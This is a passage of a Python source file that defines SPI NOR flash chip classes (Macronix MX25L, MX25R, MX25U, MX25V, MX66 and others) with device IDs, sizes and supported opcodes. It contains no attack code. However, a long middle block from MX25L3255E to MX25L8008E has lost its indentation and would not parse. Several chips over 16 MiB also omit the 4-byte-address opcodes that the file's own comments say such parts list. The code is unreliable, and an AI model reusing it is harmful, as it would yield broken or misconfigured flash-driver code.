        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L2006E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2012
    name = "mx25l2006e"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L25635E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2019
    name = "mx25l25635e"
    total_size = 33554432 # bytes
    page_size = 256 # bytes
    total_pages = 131072
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MX25L25635F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2019
    name = "mx25l25635f"
    total_size = 33554432 # bytes
    page_size = 256 # bytes
    total_pages = 131072
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
    ]
    dummy_bits = 8
class MX25L25645(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2019
    name = "mx25l25645"
    total_size = 33554432 # bytes
    page_size = 256 # bytes
    total_pages = 131072
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L25645G(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2019
    name = "mx25l25645g"
    total_size = 33554432 # bytes
    page_size = 256 # bytes
    total_pages = 131072
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
    ]
    dummy_bits = 8
class MX25L25655E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2619
    name = "mx25l25655e"
    total_size = 33554432 # bytes
    page_size = 256 # bytes
    total_pages = 131072
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class MX25L3205(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2016
    name = "mx25l3205"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L3205D(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2016
    name = "mx25l3205d"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class MX25L3235D(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x5e16
    name = "mx25l3235d"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25L3255E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x9e16
name = "mx25l3255e"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L3273E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2016
name = "mx25l3273e"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L4005(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2013
name = "mx25l4005"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L4005A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2013
name = "mx25l4005a"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L4005C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2013
name = "mx25l4005c"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L4006E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2013
name = "mx25l4006e"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L512(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2010
name = "mx25l512"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L51245(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x201a
name = "mx25l51245"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L51245G(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x201a
name = "mx25l51245g"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class MX25L512E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2010
name = "mx25l512e"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L6405(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2017
name = "mx25l6405"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L6405D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2017
name = "mx25l6405d"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L6436E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2017
name = "mx25l6436e"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L6445E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2017
name = "mx25l6445e"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L6465E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2017
name = "mx25l6465e"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L6473E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2017
name = "mx25l6473e"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L6473F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2017
name = "mx25l6473f"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L6495F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x9517
name = "mx25l6495f"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L8005(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2014
name = "mx25l8005"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L8006E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2014
name = "mx25l8006e"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L8008E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2014
name = "mx25l8008e"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
# --- Macronix MX25LM (octal-capable) and MX25R (wide-Vcc, low-power) series --
# Same data-only layout as the MX25L entries above; MX25R parts additionally
# list dual/quad (1_1_2 / 1_1_4) read and program opcodes.
class MX25LM51245(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x853a
    name = "mx25lm51245"
    total_size = 67108864 # bytes
    page_size = 256 # bytes
    total_pages = 262144
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_8,
        SpiNorFlashOpCodes.PP_1_1_8,
    ]
    dummy_bits = 8
class MX25R1035F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2811
    name = "mx25r1035f"
    total_size = 131072 # bytes
    page_size = 256 # bytes
    total_pages = 512
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MX25R1635F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2815
    name = "mx25r1635f"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MX25R2035F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2812
    name = "mx25r2035f"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MX25R3235F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2816
    name = "mx25r3235f"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MX25R4035F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2813
    name = "mx25r4035f"
    total_size = 524288 # bytes
    page_size = 256 # bytes
    total_pages = 2048
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MX25R512F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2810
    name = "mx25r512f"
    total_size = 65536 # bytes
    page_size = 256 # bytes
    total_pages = 256
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MX25R6435F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2817
    name = "mx25r6435f"
    total_size = 8388608 # bytes
    page_size = 256 # bytes
    total_pages = 32768
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25R8035F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2814
    name = "mx25r8035f"
    total_size = 1048576 # bytes
    page_size = 256 # bytes
    total_pages = 4096
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
# --- Macronix MX25U series (1.8 V SPI NOR flash) -----------------------------
# Data-only entries; *_4B opcodes indicate 4-byte-address variants for parts
# larger than 16 MiB.
class MX25U12835F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2538
    name = "mx25u12835f"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MX25U1635E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2535
    name = "mx25u1635e"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MX25U2033E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2532
    name = "mx25u2033e"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class MX25U25635F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2539
    name = "mx25u25635f"
    total_size = 33554432 # bytes
    page_size = 256 # bytes
    total_pages = 131072
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
    ]
    dummy_bits = 8
class MX25U3235E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2536
    name = "mx25u3235e"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MX25U3235F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2536
    name = "mx25u3235f"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MX25U4035(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2533
    name = "mx25u4035"
    total_size = 524288 # bytes
    page_size = 256 # bytes
    total_pages = 2048
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class MX25U51245G(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x253a
    name = "mx25u51245g"
    total_size = 67108864 # bytes
    page_size = 256 # bytes
    total_pages = 262144
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
        SpiNorFlashOpCodes.READ_1_1_4_4B,
        SpiNorFlashOpCodes.PP_1_1_4_4B,
    ]
    dummy_bits = 8
class MX25U6435E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2537
    name = "mx25u6435e"
    total_size = 8388608 # bytes
    page_size = 256 # bytes
    total_pages = 32768
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MX25U6435F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2537
    name = "mx25u6435f"
    total_size = 8388608 # bytes
    page_size = 256 # bytes
    total_pages = 32768
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class MX25U8032E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2534
    name = "mx25u8032e"
    total_size = 1048576 # bytes
    page_size = 256 # bytes
    total_pages = 4096
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25U8035(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2534
    name = "mx25u8035"
    total_size = 1048576 # bytes
    page_size = 256 # bytes
    total_pages = 4096
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
# --- Macronix MX25V series -----------------------------------------------
# Data-only entries; same field layout as the MX25L series above.
class MX25V512(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2010
    name = "mx25v512"
    total_size = 65536 # bytes
    page_size = 256 # bytes
    total_pages = 256
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25V512C(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2010
    name = "mx25v512c"
    total_size = 65536 # bytes
    page_size = 256 # bytes
    total_pages = 256
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25V8005(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2014
    name = "mx25v8005"
    total_size = 1048576 # bytes
    page_size = 256 # bytes
    total_pages = 4096
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class MX25V8035F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x2314
    name = "mx25v8035f"
    total_size = 1048576 # bytes
    page_size = 256 # bytes
    total_pages = 4096
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
# --- Macronix MX66 series (high-density, 512 Mbit - 1 Gbit) ------------------
# Data-only entries; parts > 16 MiB also list *_4B (4-byte address) opcodes.
class MX66L1G45G(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x201b
    name = "mx66l1g45g"
    total_size = 134217728 # bytes
    page_size = 256 # bytes
    total_pages = 524288
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MX66L1G55G(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x261b
    name = "mx66l1g55g"
    total_size = 134217728 # bytes
    page_size = 256 # bytes
    total_pages = 524288
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class MX66L51235F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x201a
    name = "mx66l51235f"
    total_size = 67108864 # bytes
    page_size = 256 # bytes
    total_pages = 262144
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
    ]
    dummy_bits = 8
class MX66L51235L(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x201a
    name = "mx66l51235l"
    total_size = 67108864 # bytes
    page_size = 256 # bytes
    total_pages = 262144
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
        SpiNorFlashOpCodes.READ_1_1_2_4B,
        SpiNorFlashOpCodes.READ_1_1_4_4B,
        SpiNorFlashOpCodes.PP_1_1_4_4B,
    ]
    dummy_bits = 8
class MX66U51235F(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
    device_id = 0x253a
    name = "mx66u51235f"
    total_size = 67108864 # bytes
    page_size = 256 # bytes
    total_pages = 262144
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
        SpiNorFlashOpCodes.READ_1_1_2_4B,
        SpiNorFlashOpCodes.READ_1_1_4_4B,
        SpiNorFlashOpCodes.PP_1_1_4_4B,
    ]
    dummy_bits = 8
# --- Micron/ST N25Q series ---------------------------------------------------
